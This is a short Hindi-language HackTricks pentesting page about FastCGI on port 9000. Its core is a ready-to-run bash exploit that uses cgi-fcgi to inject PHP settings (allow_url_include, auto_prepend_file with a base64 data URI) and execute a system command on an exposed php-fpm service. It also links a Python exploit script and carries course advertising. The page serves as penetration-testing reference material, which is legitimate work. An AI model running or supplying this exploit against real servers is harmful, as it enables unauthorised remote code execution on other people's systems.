9000 - Pentesting FastCGI

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

मूल जानकारी

अगर आप जानना चाहते हैं कि FastCGI क्या है तो निम्नलिखित पृष्ठ की जाँच करें:

pagedisable_functions bypass - php-fpm/FastCGI

डिफ़ॉल्ट रूप से FastCGI पोर्ट 9000 पर चलता है और nmap द्वारा पहचाना नहीं जाता है। सामान्यतः FastCGI केवल localhost में सुनता है।

RCE

FastCGI को विचारहीन कोड निष्पादित करना बहुत आसान है:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT
done

आप निम्नलिखित पायथन स्क्रिप्ट का उपयोग भी कर सकते हैं: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated